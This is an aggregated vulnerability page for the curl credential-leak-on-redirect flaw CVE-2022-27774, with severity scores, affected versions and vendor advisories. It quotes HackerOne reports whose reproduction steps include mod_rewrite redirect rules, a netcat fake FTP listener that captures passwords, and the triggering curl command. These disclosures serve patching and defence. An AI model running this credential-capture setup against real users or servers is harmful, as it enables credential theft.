CVE-2022-27774
published 2022-06-02CVE-2022-27774: An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract…
PriorityP432medium5.7CVSS 3.1
AVNACLPRLUIRSUCHINAN
EPSS
0.31%
54.3th percentile
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | curl | < curl 7.83.0-1 (bookworm) | curl 7.83.0-1 (bookworm) |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| haxx | curl | >= 0 < 7.74.0-1.3+deb11u2 | 7.74.0-1.3+deb11u2 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.83.0-1 | 7.83.0-1 |
| haxx | curl | >= 0 < 7.58.0-2ubuntu3.17 | 7.58.0-2ubuntu3.17 |
| haxx | curl | >= 0 < 7.68.0-1ubuntu2.10 | 7.68.0-1ubuntu2.10 |
| haxx | curl | >= 0 < 7.81.0-1ubuntu1.1 | 7.81.0-1ubuntu1.1 |
| haxx | curl | 4.9 – 7.82.0 | — |
| https | github.com_curl_curl | — | — |
| msrc | azl3_rust_1.75.0-14_on_azure_linux_3.0 | — | — |
| msrc | azl3_rust_1.86.0-1_on_azure_linux_3.0 | — | — |
| msrc | cm1_curl_7.76.0-9_on_cbl_mariner_1.0 | — | — |
| splunk | universal_forwarder | — | — |
| splunk | universal_forwarder | >= 8.2.0 < 8.2.12 | 8.2.12 |
| splunk | universal_forwarder | >= 9.0.0 < 9.0.6 | 9.0.6 |
CVSS provenance
nvdv3.15.7MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:P/I:N/A:N
osv8.1HIGH
vendor_ubuntu8.1HIGH
vendor_debian5.7MEDIUM
vendor_msrc5.7MEDIUM
vendor_redhat5.7MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7xmh-mw7w-rr97: An insufficiently protected credentials vulnerability exists in curl 4
ghsa_unreviewed·2022-06-03
CVE-2022-27774 [MEDIUM] CWE-522 GHSA-7xmh-mw7w-rr97: An insufficiently protected credentials vulnerability exists in curl 4
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
OSV
CVE-2022-27774: An insufficiently protected credentials vulnerability exists in curl 4
osv·2022-06-02·CVSS 5.7
CVE-2022-27774 [MEDIUM] CVE-2022-27774: An insufficiently protected credentials vulnerability exists in curl 4
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
OSV
curl vulnerabilities
osv·2022-04-28·CVSS 8.1
CVE-2022-22576 [HIGH] curl vulnerabilities
curl vulnerabilities
Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.
An attacker could possibly use this issue to access sensitive information.
(CVE-2022-22576)
Harry Sintonen discovered that curl incorrectly handled certain requests.
An attacker could possibly use this issue to expose sensitive information.
(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)
Microsoft
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is u
vendor_msrc·2022-06-14·CVSS 5.7
CVE-2022-27774 [MEDIUM] CWE-522 An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is u
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
FAQ: Is Azure Linux the only Microsoft product that includes this open-source library and is therefore potentially affected by this vulnerability?
One of the main benefits to our customers who choose to use the Azure Linux distro is the commitment to keep it up to date with the most recent and most secure versions of the open source libraries with which the distro is composed. Microsoft is committed to transparency in this work which is why we began publishing CSAF/VEX in Octobe
Ubuntu
curl vulnerabilities
vendor_ubuntu·2022-04-28·CVSS 8.1
CVE-2022-27774 [HIGH] curl vulnerabilities
Title: curl vulnerabilities
Summary: Several security issues were fixed in curl.
Patrick Monnerat discovered that curl incorrectly handled certain OAUTH2.
An attacker could possibly use this issue to access sensitive information.
(CVE-2022-22576)
Harry Sintonen discovered that curl incorrectly handled certain requests.
An attacker could possibly use this issue to expose sensitive information.
(CVE-2022-27774, CVE-2022-27775, CVE-2022-27776)
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
curl: credential leak on redirect
vendor_redhat·2022-04-27·CVSS 5.7
CVE-2022-27774 [MEDIUM] CWE-522 curl: credential leak on redirect
curl: credential leak on redirect
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
A vulnerability was found in curl. This security flaw allows leaking credentials to other servers when it follows redirects from auth-protected HTTP(S) URLs to other protocols and port numbers.
Package: rh-dotnet31-curl (.NET Core 3.1 on Red Hat Enterprise Linux) - Out of support scope
Package: curl (Red Hat Enterprise Linux 6) - Out of support scope
Package: curl (Red Hat Enterprise Linux 7) - Out of support scope
Package: jbcs-httpd24-cur
Debian
CVE-2022-27774: curl - An insufficiently protected credentials vulnerability exists in curl 4.9 to and ...
vendor_debian·2022·CVSS 5.7
CVE-2022-27774 [MEDIUM] CVE-2022-27774: curl - An insufficiently protected credentials vulnerability exists in curl 4.9 to and ...
An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.
Scope: local
bookworm: resolved (fixed in 7.83.0-1)
bullseye: resolved (fixed in 7.74.0-1.3+deb11u2)
forky: resolved (fixed in 7.83.0-1)
sid: resolved (fixed in 7.83.0-1)
trixie: resolved (fixed in 7.83.0-1)
No detection rules found.
No public exploits indexed.
HackerOne
libcurl: Improper Authentication State Management on Cross-Protocol Redirects
hackerone·2026-01-17·CVSS 5.7
CVE-2025-14524 [MEDIUM] libcurl: Improper Authentication State Management on Cross-Protocol Redirects
libcurl: Improper Authentication State Management on Cross-Protocol Redirects
Following the recent advisory for **CVE-2025-14524**, I conducted an investigation into how libcurl manages OAuth2 credentials during complex redirect chains. I have confirmed that while the library successfully protects traditional user credentials, it fails to clear OAuth2 Bearer tokens in the same way during cross-protocol or cross-origin redirects. This report provides a detailed analysis and a working reproduction of how an attacker can leverage this state-management flaw to exfiltrate valid Bearer tokens.
**AI Statement**: This report was researched and generated with the assistance of an AI agent to analyze the libcurl source code and identify inconsistent state management logic. However, the vulnerabili
HackerOne
CVE-2025-14524: bearer token leak on cross-protocol redirect
hackerone·2026-01-07·CVSS 5.7
CVE-2025-14524 [MEDIUM] CVE-2025-14524: bearer token leak on cross-protocol redirect
CVE-2025-14524: bearer token leak on cross-protocol redirect
## Summary:
A vulnerability exists in `libcurl` regarding the handling of OAuth2 Bearer tokens (`CURLOPT_XOAUTH2_BEARER`) during HTTP redirects.
While `libcurl` correctly clears standard authentication credentials (`CURLOPT_USERPWD`) when following a redirect to a different host, port, or protocol (a security hardening introduced to fix CVE-2022-27774), it fails to apply the same logic to the OAuth2 Bearer token.
If an application using `libcurl` connects to a trusted server but is redirected to a malicious server (e.g., via an Open Redirect vulnerability) on a protocol supporting SASL (like IMAP, SMTP, or POP3), the valid Bearer token is automatically sent to the attacker. This happens because the token remains in the handle
HackerOne
CVE-2022-27776: Auth/cookie leak on redirect
hackerone·2022-04-29·CVSS 5.7
CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect
CVE-2022-27776: Auth/cookie leak on redirect
## Summary:
curl/libcurl can be coaxed to leak Authorization / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).
## Steps To Reproduce:
1. Configure for example Apache2 to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]
```
... the attacker could also use `.htpasswd` file to do so.
2. Set up netcat to listen for the incoming secrets:
`while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' |
HackerOne
CVE-2022-27774: Credential leak on redirect
hackerone·2022-04-29·CVSS 5.7
CVE-2022-27774 [MEDIUM] CVE-2022-27774: Credential leak on redirect
CVE-2022-27774: Credential leak on redirect
## Summary:
curl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
## Steps To Reproduce:
1. Configure for example Apache2 on `firstsite.tld` to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
2. Capture credentials at `secondsite.tld` for example with:
```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```
3. `curl -L --user foo https://firstsite.tld/redirectpoc`
4. The entered password is visible in the fake FTP server:
```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```
There are several issues here:
1. Th
HackerOne
CVE-2022-27774: Credential leak on redirect
hackerone·2022-04-27·CVSS 5.7
CVE-2022-27774 [MEDIUM] CVE-2022-27774: Credential leak on redirect
CVE-2022-27774: Credential leak on redirect
## Summary:
Curl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL.
## Steps To Reproduce:
1. Configure for example Apache2 on `firstsite.tld` to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L]
```
2. Capture credentials at `secondsite.tld` for example with:
```
while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done
```
3. `curl -L --user foo https://firstsite.tld/redirectpoc`
4. The entered password is visible in the fake FTP server:
```
Listening on 0.0.0.0 9999
Connection received on somehost someport
USER foo
PASS secretpassword
```
There are several issues here:
1. The creden
HackerOne
CVE-2022-27776: Auth/cookie leak on redirect
hackerone·2022-04-27·CVSS 5.7
CVE-2022-27776 [MEDIUM] CVE-2022-27776: Auth/cookie leak on redirect
CVE-2022-27776: Auth/cookie leak on redirect
## Summary:
Curl can be coaxed to leak Authorisation / Cookie headers by redirecting request to http:// URL on the same host. Successful exploitation requires that the attacker can either Man-in-the-Middle the connection or can access the traffic at the recipient side (for example by redirecting to a non-privileged port such as 9999 on the same host).
## Steps To Reproduce:
1. Configure for example Apache2 to perform redirect with mod_rewrite:
```
RewriteCond %{HTTP_USER_AGENT} "^curl/"
RewriteRule ^/redirectpoc http://hostname.tld:9999 [R=301,L]
```
... the attacker could also use `.htpasswd` file to do so.
2. Set up netcat to listen for the incoming secrets:
`while true; do echo -ne 'HTTP/1.1 404 nope\r\nContent-Length: 0\r\n\r\n' | nc -v -
https://hackerone.com/reports/1543773https://lists.debian.org/debian-lts-announce/2023/01/msg00028.htmlhttps://security.gentoo.org/glsa/202212-01https://security.netapp.com/advisory/ntap-20220609-0008/https://www.debian.org/security/2022/dsa-5197https://hackerone.com/reports/1543773https://lists.debian.org/debian-lts-announce/2023/01/msg00028.htmlhttps://security.gentoo.org/glsa/202212-01https://security.netapp.com/advisory/ntap-20220609-0008/https://www.debian.org/security/2022/dsa-5197https://hackerone.com/reports/1543773
2022-06-02
Published